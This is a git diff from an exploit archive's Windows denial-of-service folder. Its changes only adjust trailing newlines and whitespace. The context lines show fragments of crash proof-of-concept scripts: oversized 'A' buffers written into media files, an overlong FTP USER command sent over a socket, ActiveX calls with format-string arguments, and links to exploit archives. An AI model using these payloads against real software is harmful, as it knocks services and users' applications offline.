--git a/platforms/windows/dos/10909.pl b/platforms/windows/dos/10909.pl index 7131f542c..e8304249c 100755 --- a/platforms/windows/dos/10909.pl +++ b/platforms/windows/dos/10909.pl @@ -12,4 +12,4 @@ $boom="A" x 2000; open(myfile,">>$file"); print myfile $boom; close(myfile); -print "Done ..! ~#"; +print "Done ..! ~#"; \ No newline at end of file diff --git a/platforms/windows/dos/10920.cpp b/platforms/windows/dos/10920.cpp index 56aa33332..525859e6d 100755 --- a/platforms/windows/dos/10920.cpp +++ b/platforms/windows/dos/10920.cpp @@ -140,4 +140,4 @@ char file[]= int len; len=strlen(source); memcpy(dest,source,len+1); - return len;} + return len;} \ No newline at end of file diff --git a/platforms/windows/dos/1093.c b/platforms/windows/dos/1093.c index a6b5eb7a9..917432fbc 100755 --- a/platforms/windows/dos/1093.c +++ b/platforms/windows/dos/1093.c @@ -130,4 +130,4 @@ WSACleanup(); return 0; } -// milw0rm.com [2005-07-07] +// milw0rm.com [2005-07-07] \ No newline at end of file diff --git a/platforms/windows/dos/1094.pl b/platforms/windows/dos/1094.pl index 926ce6265..e088eb037 100755 --- a/platforms/windows/dos/1094.pl +++ b/platforms/windows/dos/1094.pl @@ -37,4 +37,4 @@ close($s); print " <+> Ok now target web server maybe DoSeD.\n\n"; -# milw0rm.com [2005-07-07] +# milw0rm.com [2005-07-07] \ No newline at end of file diff --git a/platforms/windows/dos/1100.pl b/platforms/windows/dos/1100.pl index c716b9494..563d0c7a7 100755 --- a/platforms/windows/dos/1100.pl +++ b/platforms/windows/dos/1100.pl @@ -67,4 +67,4 @@ sleep(1); close(SOCK); exit; -# milw0rm.com [2005-07-11] +# milw0rm.com [2005-07-11] \ No newline at end of file diff --git a/platforms/windows/dos/1101.c b/platforms/windows/dos/1101.c index bfcabdaa7..07bc07a4d 100755 --- a/platforms/windows/dos/1101.c +++ b/platforms/windows/dos/1101.c @@ -105,4 +105,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2005-07-12] +// milw0rm.com [2005-07-12] \ No newline at end of file diff --git a/platforms/windows/dos/11034.txt b/platforms/windows/dos/11034.txt index 0464e2286..a1eb7627b 100755 --- a/platforms/windows/dos/11034.txt +++ b/platforms/windows/dos/11034.txt @@ -13,4 +13,4 @@ Scott White Senior Penetration Tester http://www.securestate.com -http://securestate.blogspot.com +http://securestate.blogspot.com \ No newline at end of file diff --git a/platforms/windows/dos/1104.cpp b/platforms/windows/dos/1104.cpp index a9ec87085..c9dbcaf07 100755 --- a/platforms/windows/dos/1104.cpp +++ b/platforms/windows/dos/1104.cpp @@ -65,4 +65,4 @@ main(int argc,char **argv) return 1; } -// milw0rm.com [2005-07-14] +// milw0rm.com [2005-07-14] \ No newline at end of file diff --git a/platforms/windows/dos/1105.c b/platforms/windows/dos/1105.c index 6b55aa69c..6c885da42 100755 --- a/platforms/windows/dos/1105.c +++ b/platforms/windows/dos/1105.c @@ -220,4 +220,4 @@ u_long resolv(char *host) { #endif -// milw0rm.com [2005-07-14] +// milw0rm.com [2005-07-14] \ No newline at end of file diff --git a/platforms/windows/dos/11062.txt b/platforms/windows/dos/11062.txt index 26a8dd95a..b1e68e99c 100755 --- a/platforms/windows/dos/11062.txt +++ b/platforms/windows/dos/11062.txt @@ -5,5 +5,4 @@ # Code : -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11062.zip (sopcast_exp.zip) - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11062.zip (sopcast_exp.zip) \ No newline at end of file diff --git a/platforms/windows/dos/11065.html b/platforms/windows/dos/11065.html index b9c8f3395..6b5df6e0f 100755 --- a/platforms/windows/dos/11065.html +++ b/platforms/windows/dos/11065.html @@ -2,4 +2,4 @@ # Tested on: xpsp3 ie6 # Code : -<object id=TestObj classid="CLSID:{E5960BC4-A76B-4211-BEEC-9AEE2AF8AAE6}" style="width:100;height:350"></object> +<object id=TestObj classid="CLSID:{E5960BC4-A76B-4211-BEEC-9AEE2AF8AAE6}" style="width:100;height:350"></object> \ No newline at end of file diff --git a/platforms/windows/dos/1107.pl b/platforms/windows/dos/1107.pl index da4a92c11..db2e40fad 100755 --- a/platforms/windows/dos/1107.pl +++ b/platforms/windows/dos/1107.pl @@ -110,4 +110,4 @@ sleep(1); close(SOCK1); exit; -# milw0rm.com [2005-07-15] +# milw0rm.com [2005-07-15] \ No newline at end of file diff --git a/platforms/windows/dos/11070.txt b/platforms/windows/dos/11070.txt index 18eb88972..701e23107 100755 --- a/platforms/windows/dos/11070.txt +++ b/platforms/windows/dos/11070.txt @@ -72,4 +72,4 @@ http://www.hackattack.com Natal Networks was founded by Hellcode Research Team in 2009. Main mission of Natal Network is discover and research vulnerabilities. Providing penetration tests and security auditing services. -More about; www.natalnetworks.com +More about; www.natalnetworks.com \ No newline at end of file diff --git a/platforms/windows/dos/11084.pl b/platforms/windows/dos/11084.pl index d9306d5a5..321b65629 100755 --- a/platforms/windows/dos/11084.pl +++ b/platforms/windows/dos/11084.pl @@ -12,4 +12,4 @@ $boom="http://"."A" x 8000000; open(myfile,'>>Crash.rm') || die "Cannot Creat file\n\n"; print myfile $boom; -print "Done..!~#\n"; +print "Done..!~#\n"; \ No newline at end of file diff --git a/platforms/windows/dos/1109.pl b/platforms/windows/dos/1109.pl index e397d6655..de230df22 100755 --- a/platforms/windows/dos/1109.pl +++ b/platforms/windows/dos/1109.pl @@ -81,4 +81,4 @@ my $mw = MainWindow->new(-title => 'INFO',); $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack; MainLoop; -# milw0rm.com [2005-07-15] +# milw0rm.com [2005-07-15] \ No newline at end of file diff --git a/platforms/windows/dos/11095.txt b/platforms/windows/dos/11095.txt index af1415c44..f3c582ab9 100755 --- a/platforms/windows/dos/11095.txt +++ b/platforms/windows/dos/11095.txt @@ -39,5 +39,4 @@ try: s.close() print "[+] Done.\n" except: - print "[-] Could not connect to server!\n" - + print "[-] Could not connect to server!\n" \ No newline at end of file diff --git a/platforms/windows/dos/111.c b/platforms/windows/dos/111.c index 09f99e3cf..09dd12983 100755 --- a/platforms/windows/dos/111.c +++ b/platforms/windows/dos/111.c @@ -134,4 +134,4 @@ sizeof(addr)) == -1) exit(EXIT_SUCCESS); } -// milw0rm.com [2003-10-18] +// milw0rm.com [2003-10-18] \ No newline at end of file diff --git a/platforms/windows/dos/1110.txt b/platforms/windows/dos/1110.txt index 72214af54..4f8ccd430 100755 --- a/platforms/windows/dos/1110.txt +++ b/platforms/windows/dos/1110.txt @@ -39,4 +39,4 @@ ebx is controlable. but gets a read access violation. ....be kool and create a PoC and change your sig to the exploit.jpg -# milw0rm.com [2005-07-15] +# milw0rm.com [2005-07-15] \ No newline at end of file diff --git a/platforms/windows/dos/11103.html b/platforms/windows/dos/11103.html index c282b46c1..52838a799 100755 --- a/platforms/windows/dos/11103.html +++ b/platforms/windows/dos/11103.html @@ -7,4 +7,4 @@ tested :[win xp sp2] Greetz [2] : WwW.v99x.CoM we miss you ,his0k4 -<object classid='clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921' id='target' ></object> +<object classid='clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921' id='target' ></object> \ No newline at end of file diff --git a/platforms/windows/dos/11130.pl b/platforms/windows/dos/11130.pl index c0857c42a..d8760c3b4 100755 --- a/platforms/windows/dos/11130.pl +++ b/platforms/windows/dos/11130.pl @@ -8,6 +8,4 @@ my $file="skin1.ini"; #C:\Program Files\OfilterPlayer\skin open($FILE,">$file"); print $FILE $boom; close($FILE); -print "File Successfully Created\n"; - - +print "File Successfully Created\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11131.pl b/platforms/windows/dos/11131.pl index 931761a7c..fa2408b8a 100755 --- a/platforms/windows/dos/11131.pl +++ b/platforms/windows/dos/11131.pl @@ -65,9 +65,4 @@ $sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], Proto => 'tcp'); my $ftp2 = <$sock2> || die " [+] DoS successful\n"; print " [!] DoS did not seem to work\n"; -print " ** $ftp2\n"; - - - - - +print " ** $ftp2\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11132.pl b/platforms/windows/dos/11132.pl index 502bf8d12..6be46b092 100755 --- a/platforms/windows/dos/11132.pl +++ b/platforms/windows/dos/11132.pl @@ -10,6 +10,4 @@ my $file="dos.nsp"; open($FILE,">$file"); print $FILE $boom; close($FILE); -print "File Successfully Created\n"; - - +print "File Successfully Created\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11133.pl b/platforms/windows/dos/11133.pl index 6df919590..0f93ef606 100755 --- a/platforms/windows/dos/11133.pl +++ b/platforms/windows/dos/11133.pl @@ -18,6 +18,4 @@ open($FILE,">$file"); print $FILE $boom; close($FILE); print "File Successfully Created\n"; -######################################################################################## - - +######################################################################################## \ No newline at end of file diff --git a/platforms/windows/dos/11149.c b/platforms/windows/dos/11149.c index 9bdf7e840..5d590ef29 100755 --- a/platforms/windows/dos/11149.c +++ b/platforms/windows/dos/11149.c @@ -97,4 +97,4 @@ { printf("\n[*]%s\n",msg); } - + \ No newline at end of file diff --git a/platforms/windows/dos/11150.txt b/platforms/windows/dos/11150.txt index e56459224..380e04a7c 100755 --- a/platforms/windows/dos/11150.txt +++ b/platforms/windows/dos/11150.txt @@ -44,4 +44,4 @@ print "Done..!~#\n"; [~]{[(D!R 4ll 0R D!E)]}; -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/dos/1116.c b/platforms/windows/dos/1116.c index c4b5fd0d5..85a03fd29 100755 --- a/platforms/windows/dos/1116.c +++ b/platforms/windows/dos/1116.c @@ -454,4 +454,4 @@ return 0; } -// milw0rm.com [2005-07-21] +// milw0rm.com [2005-07-21] \ No newline at end of file diff --git a/platforms/windows/dos/11190.txt b/platforms/windows/dos/11190.txt index 0a22511b6..60d1183f0 100755 --- a/platforms/windows/dos/11190.txt +++ b/platforms/windows/dos/11190.txt @@ -41,4 +41,4 @@ target.BindToFile arg1 ,arg2 </script> </job> -</package> +</package> \ No newline at end of file diff --git a/platforms/windows/dos/11192.txt b/platforms/windows/dos/11192.txt index a88825555..ebd09ebe0 100755 --- a/platforms/windows/dos/11192.txt +++ b/platforms/windows/dos/11192.txt @@ -31,4 +31,4 @@ Urls: tcc.hellcode.net -forum.hellcode.net +forum.hellcode.net \ No newline at end of file diff --git a/platforms/windows/dos/11195.html b/platforms/windows/dos/11195.html index 79e630f67..9da823341 100755 --- a/platforms/windows/dos/11195.html +++ b/platforms/windows/dos/11195.html @@ -16,5 +16,4 @@ arg2="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" target.DeleteValue arg1 ,arg2 -</script> - +</script> \ No newline at end of file diff --git a/platforms/windows/dos/11197.py b/platforms/windows/dos/11197.py index e78d3b0c4..3e3dd1f48 100755 --- a/platforms/windows/dos/11197.py +++ b/platforms/windows/dos/11197.py @@ -19,5 +19,4 @@ chars = "A"*90000 crush = "\x41\x41\x41\x41" file=open('exp.smi','w') file.write(chars+crush+chars) -file.close() - +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/11209.pl b/platforms/windows/dos/11209.pl index de8bbc916..e4c6fd394 100755 --- a/platforms/windows/dos/11209.pl +++ b/platforms/windows/dos/11209.pl @@ -14,4 +14,4 @@ print $FILE "$boom"; close($FILE); -print "Done..!~#\n"; +print "Done..!~#\n"; \ No newline at end of file diff --git a/platforms/windows/dos/1121.pl b/platforms/windows/dos/1121.pl index 3d4fe5fe1..9f03a0376 100755 --- a/platforms/windows/dos/1121.pl +++ b/platforms/windows/dos/1121.pl @@ -47,4 +47,4 @@ for ($i = 1; $i <= 40; $i++) } } -# milw0rm.com [2005-07-26] +# milw0rm.com [2005-07-26] \ No newline at end of file diff --git a/platforms/windows/dos/11214.html b/platforms/windows/dos/11214.html index d3fdb206d..b3e97af20 100755 --- a/platforms/windows/dos/11214.html +++ b/platforms/windows/dos/11214.html @@ -16,5 +16,4 @@ arg1="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" target.RichUploadControlContextData = arg1 -</script> - +</script> \ No newline at end of file diff --git a/platforms/windows/dos/11227.pl b/platforms/windows/dos/11227.pl index 88da73112..e489f3293 100755 --- a/platforms/windows/dos/11227.pl +++ b/platforms/windows/dos/11227.pl @@ -16,6 +16,4 @@ my $boom = "A" x 1337; my $filename = "b00m.mp3"; open (FILE,">$filename"); print FILE "$boom"; -print "\nFile successfully created!\n"; - - +print "\nFile successfully created!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11228.pl b/platforms/windows/dos/11228.pl index 6897065d8..9a5e5dafa 100755 --- a/platforms/windows/dos/11228.pl +++ b/platforms/windows/dos/11228.pl @@ -38,4 +38,4 @@ my $boom = "A" x 1337; my $filename = "b00m.pls"; open (FILE,">$filename"); print FILE "$boom"; -print "\nFile successfully created!\n"; +print "\nFile successfully created!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11245.txt b/platforms/windows/dos/11245.txt index c819b8460..6606bd121 100755 --- a/platforms/windows/dos/11245.txt +++ b/platforms/windows/dos/11245.txt @@ -10,4 +10,4 @@ This same bug was in early version of firfox,found by (Wojciech Pawlikowski) Thi This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11245.rar (Firefox-v3.6_PoC.rar) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11245.rar (Firefox-v3.6_PoC.rar) \ No newline at end of file diff --git a/platforms/windows/dos/11248.pl b/platforms/windows/dos/11248.pl index 541a262d6..ad87cb2c9 100755 --- a/platforms/windows/dos/11248.pl +++ b/platforms/windows/dos/11248.pl @@ -23,7 +23,4 @@ my $overflow="Winamp 5.572"."A"x600; open(myfile,'>>whatsnew.txt'); -print myfile $overflow; - - - +print myfile $overflow; \ No newline at end of file diff --git a/platforms/windows/dos/1126.c b/platforms/windows/dos/1126.c index a8710e7ea..8315ea863 100755 --- a/platforms/windows/dos/1126.c +++ b/platforms/windows/dos/1126.c @@ -124,4 +124,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2005-08-01] +// milw0rm.com [2005-08-01] \ No newline at end of file diff --git a/platforms/windows/dos/11266.pl b/platforms/windows/dos/11266.pl index 5c3af19ed..95c70a8bf 100755 --- a/platforms/windows/dos/11266.pl +++ b/platforms/windows/dos/11266.pl @@ -16,5 +16,4 @@ my $boom = "http://"."\x41" x 1337; my $filename = "b00m.wav"; open (FILE,">$filename"); print FILE "$boom"; -print "\nFile successfully created!\n"; - +print "\nFile successfully created!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/1127.cpp b/platforms/windows/dos/1127.cpp index b5fc1fb15..bd27218b5 100755 --- a/platforms/windows/dos/1127.cpp +++ b/platforms/windows/dos/1127.cpp @@ -114,4 +114,4 @@ main(int argc, char *argv[]) WSACleanup(); } -// milw0rm.com [2005-08-01] +// milw0rm.com [2005-08-01] \ No newline at end of file diff --git a/platforms/windows/dos/1129.c b/platforms/windows/dos/1129.c index b25f1eb71..aaeeda155 100755 --- a/platforms/windows/dos/1129.c +++ b/platforms/windows/dos/1129.c @@ -154,4 +154,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2005-08-02] +// milw0rm.com [2005-08-02] \ No newline at end of file diff --git a/platforms/windows/dos/113.pl b/platforms/windows/dos/113.pl index 93f389df2..f09a5ce99 100755 --- a/platforms/windows/dos/113.pl +++ b/platforms/windows/dos/113.pl @@ -128,4 +128,4 @@ sub SMTP } -# milw0rm.com [2003-10-22] +# milw0rm.com [2003-10-22] \ No newline at end of file diff --git a/platforms/windows/dos/11332.pl b/platforms/windows/dos/11332.pl index bcda7d1a9..8b841db54 100755 --- a/platforms/windows/dos/11332.pl +++ b/platforms/windows/dos/11332.pl @@ -50,5 +50,4 @@ open(myfile,'>> uhoh2.html'); print myfile $header.$uhoh2.$footer; ################################################################## -print "\nDone, successfully created!\n"; - +print "\nDone, successfully created!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11338.py b/platforms/windows/dos/11338.py index cedcb1cde..aef16d472 100755 --- a/platforms/windows/dos/11338.py +++ b/platforms/windows/dos/11338.py @@ -27,4 +27,4 @@ try: crash.write(exploit); crash.close(); except: - print "[-] Error: You do not have correct permissions.." + print "[-] Error: You do not have correct permissions.." \ No newline at end of file diff --git a/platforms/windows/dos/11363.c b/platforms/windows/dos/11363.c index e929a8e5f..7eb2b5d5e 100755 --- a/platforms/windows/dos/11363.c +++ b/platforms/windows/dos/11363.c @@ -7018,4 +7018,4 @@ void exploit(char*,char*); void print(char* msg) { printf("[*]%s\n",msg); - } + } \ No newline at end of file diff --git a/platforms/windows/dos/1137.pl b/platforms/windows/dos/1137.pl index 54449e8d8..bf08c0d6b 100755 --- a/platforms/windows/dos/1137.pl +++ b/platforms/windows/dos/1137.pl @@ -59,4 +59,4 @@ send($sock,$buff,0) || die "[-] send error:$@\n"; print "[+] DONE..Server Out of Memory\n"; close($sock); -# milw0rm.com [2005-08-05] +# milw0rm.com [2005-08-05] \ No newline at end of file diff --git a/platforms/windows/dos/11391.py b/platforms/windows/dos/11391.py index c3771c35d..52c3c163a 100755 --- a/platforms/windows/dos/11391.py +++ b/platforms/windows/dos/11391.py @@ -56,4 +56,4 @@ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.112',21)) s.recv(1024) s.send('USER '+buffer+'\r\n') -s.recv(1024) +s.recv(1024) \ No newline at end of file diff --git a/platforms/windows/dos/11392.c b/platforms/windows/dos/11392.c index fc15bc4f4..c13bff2a9 100755 --- a/platforms/windows/dos/11392.c +++ b/platforms/windows/dos/11392.c @@ -172,6 +172,4 @@ void buildfile(char*); s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; - } - - + } \ No newline at end of file diff --git a/platforms/windows/dos/11407.txt b/platforms/windows/dos/11407.txt index 7b3c5d087..a43daa743 100755 --- a/platforms/windows/dos/11407.txt +++ b/platforms/windows/dos/11407.txt @@ -81,4 +81,4 @@ browseui!SHOpenFolderWindow+22c 00162ca8 00000000 00000000 shdocvw!IEWinMain+133 001523ba 00000001 0140d0b8 iexplore!WinMainT+2de 00400000 00000000 001523ba iexplore!_ModuleEntry+99 0140d0b8 00000018 7ffdf000 -kernel32!BaseProcessStart+23 00402451 00000000 78746341 +kernel32!BaseProcessStart+23 00402451 00000000 78746341 \ No newline at end of file diff --git a/platforms/windows/dos/1143.sys b/platforms/windows/dos/1143.sys index 96c03a73d..b29b34620 100755 --- a/platforms/windows/dos/1143.sys +++ b/platforms/windows/dos/1143.sys @@ -35,4 +35,4 @@ s_binary("000002020000"); s_string_variable(""); s_block_end("packet_3"); -// milw0rm.com [2005-08-09] +// milw0rm.com [2005-08-09] \ No newline at end of file diff --git a/platforms/windows/dos/11432.txt b/platforms/windows/dos/11432.txt index 444bbf2bb..2d1533b09 100755 --- a/platforms/windows/dos/11432.txt +++ b/platforms/windows/dos/11432.txt @@ -69,4 +69,4 @@ asheesh(); ======================================================================================================================== -#If you have any questions, comments, or concerns, feel free to contact me. +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/windows/dos/11438.txt b/platforms/windows/dos/11438.txt index 8a23ab1e1..eb3af3074 100755 --- a/platforms/windows/dos/11438.txt +++ b/platforms/windows/dos/11438.txt @@ -80,9 +80,4 @@ asheesh(); -#If you have any questions, comments, or concerns, feel free to contact me. - - - - - +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/windows/dos/11451.pl b/platforms/windows/dos/11451.pl index 010835346..f31c039f6 100755 --- a/platforms/windows/dos/11451.pl +++ b/platforms/windows/dos/11451.pl @@ -13,4 +13,4 @@ my $bb="tro0oqy.mp3"; my $fk="\x41" x 10000; open (myfile,'>>tro0oqy.mp3'); print myfile $fk; -print "great\n " +print "great\n " \ No newline at end of file diff --git a/platforms/windows/dos/11533.pl b/platforms/windows/dos/11533.pl index c10a370f3..bb3ed4e3a 100755 --- a/platforms/windows/dos/11533.pl +++ b/platforms/windows/dos/11533.pl @@ -80,4 +80,4 @@ print nri $id.$op; print "\n ~ Invasion started...\n"; sleep 1;close nri; - print "\n ~ File $fl invaded host.\n"; + print "\n ~ File $fl invaded host.\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11534.pl b/platforms/windows/dos/11534.pl index 0f3ac2f30..e38adc2ac 100755 --- a/platforms/windows/dos/11534.pl +++ b/platforms/windows/dos/11534.pl @@ -40,5 +40,4 @@ print (file $buff); ####################################################################################### print "\n[+] Done!\n [+] Open with VKPlayer and play\n -[+] Coded by cr4wl3r\n"; - +[+] Coded by cr4wl3r\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11536.pl b/platforms/windows/dos/11536.pl index ecb14d6ff..c29e32c46 100755 --- a/platforms/windows/dos/11536.pl +++ b/platforms/windows/dos/11536.pl @@ -933,5 +933,4 @@ print (file $buff); ####################################################################################### print "\n[+] Done!\n [+] Open with Gom Player\n -[+] Coded by cr4wl3r\n"; - +[+] Coded by cr4wl3r\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11540.pl b/platforms/windows/dos/11540.pl index 82d04a805..c07827f8c 100755 --- a/platforms/windows/dos/11540.pl +++ b/platforms/windows/dos/11540.pl @@ -25,5 +25,4 @@ my $fuck = "\x41" x 666; my $file = "lamerz.wav"; open (FILE,">$file") or die "[!]Cannot open file"; print FILE "$fuck"; -print "\nFile successfully created!\n"; - +print "\nFile successfully created!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/1156.c b/platforms/windows/dos/1156.c index 985a98e16..8de2c2217 100755 --- a/platforms/windows/dos/1156.c +++ b/platforms/windows/dos/1156.c @@ -252,4 +252,4 @@ u_long resolv(char *host) { } #endif -// milw0rm.com [2005-08-17] +// milw0rm.com [2005-08-17] \ No newline at end of file diff --git a/platforms/windows/dos/1158.pl b/platforms/windows/dos/1158.pl index 580962400..c6839a09d 100755 --- a/platforms/windows/dos/1158.pl +++ b/platforms/windows/dos/1158.pl @@ -45,4 +45,4 @@ else } #===== End WS_FTP_Overflow.pl ===== -# milw0rm.com [2004-11-29] +# milw0rm.com [2004-11-29] \ No newline at end of file diff --git a/platforms/windows/dos/1159.pl b/platforms/windows/dos/1159.pl index 5cb02357b..166c1167f 100755 --- a/platforms/windows/dos/1159.pl +++ b/platforms/windows/dos/1159.pl @@ -37,4 +37,4 @@ else } #===== End Mercury32_Overflow.pl ===== -# milw0rm.com [2004-12-01] +# milw0rm.com [2004-12-01] \ No newline at end of file diff --git a/platforms/windows/dos/1160.pl b/platforms/windows/dos/1160.pl index 8e973d990..d028ebdfa 100755 --- a/platforms/windows/dos/1160.pl +++ b/platforms/windows/dos/1160.pl @@ -37,4 +37,4 @@ else } #===== End GoldenFTPServer_Overflow.pl ===== -# milw0rm.com [2005-04-27] +# milw0rm.com [2005-04-27] \ No newline at end of file diff --git a/platforms/windows/dos/11617.txt b/platforms/windows/dos/11617.txt index 171b09052..8c6d23ed8 100755 --- a/platforms/windows/dos/11617.txt +++ b/platforms/windows/dos/11617.txt @@ -88,4 +88,4 @@ You came empty handed, you will leave empty handed. What is yours today, belonge Tum khaali haath aaye, khaali haath chale. Jo aaj tumhara hain, wao kal kisi aur ka tha, parso kisi aur ka hoga. Tum isse apna samajhkar magna ho rahe ho,bus yahi prasannatha tumhare dukhon ka kaaran hain. -#If you have any questions, comments, or concerns, feel free to contact me. +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/windows/dos/1162.pl b/platforms/windows/dos/1162.pl index 1ccb73c46..bcd215e59 100755 --- a/platforms/windows/dos/1162.pl +++ b/platforms/windows/dos/1162.pl @@ -37,4 +37,4 @@ else } #===== End GoodTechSMTPServer_DOS.pl ===== -# milw0rm.com [2005-06-07] +# milw0rm.com [2005-06-07] \ No newline at end of file diff --git a/platforms/windows/dos/11622.php b/platforms/windows/dos/11622.php index 9e11c3e02..c15f9e166 100755 --- a/platforms/windows/dos/11622.php +++ b/platforms/windows/dos/11622.php @@ -163,4 +163,4 @@ //[2010-03-03 20:47:46] //i cut be milion dolar man ;= -?> +?> \ No newline at end of file diff --git a/platforms/windows/dos/1163.pl b/platforms/windows/dos/1163.pl index a42f9f150..a91d2b8bb 100755 --- a/platforms/windows/dos/1163.pl +++ b/platforms/windows/dos/1163.pl @@ -38,4 +38,4 @@ else } #===== End IAeMailServer_DOS.pl ===== -# milw0rm.com [2005-06-26] +# milw0rm.com [2005-06-26] \ No newline at end of file diff --git a/platforms/windows/dos/11630.pl b/platforms/windows/dos/11630.pl index 84245f63b..427eeb86b 100755 --- a/platforms/windows/dos/11630.pl +++ b/platforms/windows/dos/11630.pl @@ -16,5 +16,4 @@ my $boom = "A" x 1337; my $filename = "sploit.mp3"; open (FILE,">$filename"); print FILE "$boom"; -print "\nDone!\n"; - +print "\nDone!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11632.txt b/platforms/windows/dos/11632.txt index cdac8e315..a21dd3400 100755 --- a/platforms/windows/dos/11632.txt +++ b/platforms/windows/dos/11632.txt @@ -15,4 +15,4 @@ Response * 2/26/2010 Crash Confirmed * 3/03/2010 Patch date: Approx. 2 weeks -Expected: 3/19/2010 +Expected: 3/19/2010 \ No newline at end of file diff --git a/platforms/windows/dos/11639.txt b/platforms/windows/dos/11639.txt index f4319b384..9f1a2f83f 100755 --- a/platforms/windows/dos/11639.txt +++ b/platforms/windows/dos/11639.txt @@ -14,4 +14,4 @@ Chrome will through up the "Aw, Snap!" Know your enemy -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11639.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11639.zip \ No newline at end of file diff --git a/platforms/windows/dos/1164.pl b/platforms/windows/dos/1164.pl index be61fc177..aae706978 100755 --- a/platforms/windows/dos/1164.pl +++ b/platforms/windows/dos/1164.pl @@ -37,4 +37,4 @@ else } #===== Start BusMail_SMTPDOS.pl ===== -# milw0rm.com [2005-07-30] +# milw0rm.com [2005-07-30] \ No newline at end of file diff --git a/platforms/windows/dos/1165.pl b/platforms/windows/dos/1165.pl index 08441fc6e..0c7dd9e84 100755 --- a/platforms/windows/dos/1165.pl +++ b/platforms/windows/dos/1165.pl @@ -38,4 +38,4 @@ else } #===== End Inframail_SMTPOverflow.pl ===== -# milw0rm.com [2005-06-27] +# milw0rm.com [2005-06-27] \ No newline at end of file diff --git a/platforms/windows/dos/11652.py b/platforms/windows/dos/11652.py index ee7b3a496..72ab8ca1e 100755 --- a/platforms/windows/dos/11652.py +++ b/platforms/windows/dos/11652.py @@ -8,4 +8,4 @@ bad=open('crash.mp3', 'w') bad.write('A'*0x1000) -bad.close() +bad.close() \ No newline at end of file diff --git a/platforms/windows/dos/1166.pl b/platforms/windows/dos/1166.pl index 1b806c1cf..bad4de732 100755 --- a/platforms/windows/dos/1166.pl +++ b/platforms/windows/dos/1166.pl @@ -46,4 +46,4 @@ else } #===== End Inframail_FTPOverflow.pl ===== -# milw0rm.com [2005-06-27] +# milw0rm.com [2005-06-27] \ No newline at end of file diff --git a/platforms/windows/dos/11724.pl b/platforms/windows/dos/11724.pl index 8aab8639e..1bff09a8c 100755 --- a/platforms/windows/dos/11724.pl +++ b/platforms/windows/dos/11724.pl @@ -14,5 +14,4 @@ open(file, "> xploit.avi"); print (file $bf); print "\n\n[+] Done!\n [+] AVI file created..\n -[+] Z-at-Enigma7.net\n"; - +[+] Z-at-Enigma7.net\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11803.txt b/platforms/windows/dos/11803.txt index dab9ba87c..091698250 100755 --- a/platforms/windows/dos/11803.txt +++ b/platforms/windows/dos/11803.txt @@ -10,5 +10,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp Ref: - * http://www.crimsoneditor.com/ - + * http://www.crimsoneditor.com/ \ No newline at end of file diff --git a/platforms/windows/dos/11839.py b/platforms/windows/dos/11839.py index 92bc6cf6a..5e65e8992 100755 --- a/platforms/windows/dos/11839.py +++ b/platforms/windows/dos/11839.py @@ -17,4 +17,4 @@ try: print "[+] File > Music Library > Add Files..." print "[+] Open b0t.wma and play it.\n" except: - print "\n[-] Error.. Can't write file to system.\n" + print "\n[-] Error.. Can't write file to system.\n" \ No newline at end of file diff --git a/platforms/windows/dos/11842.py b/platforms/windows/dos/11842.py index 1932329b9..e9b836e9f 100755 --- a/platforms/windows/dos/11842.py +++ b/platforms/windows/dos/11842.py @@ -47,5 +47,4 @@ print '[+] Buffer sent' -sock.close() - +sock.close() \ No newline at end of file diff --git a/platforms/windows/dos/11861.pl b/platforms/windows/dos/11861.pl index 319b7b434..357eb3fc6 100755 --- a/platforms/windows/dos/11861.pl +++ b/platforms/windows/dos/11861.pl @@ -20,4 +20,4 @@ my $ezA = "\x41"; my $file = "2ez.mp3"; open (FILE,">$file") or die "[!]Cannot open file"; print FILE "$ezA"; -print "\n\tMP3 Created!\n"; +print "\n\tMP3 Created!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/11878.py b/platforms/windows/dos/11878.py index 6d92c089b..07b315f92 100755 --- a/platforms/windows/dos/11878.py +++ b/platforms/windows/dos/11878.py @@ -215,7 +215,4 @@ if __name__ == '__main__': if len(sys.argv) >= 3: port = sys.argv[2] f = fuzz() - f.run() - - - + f.run() \ No newline at end of file diff --git 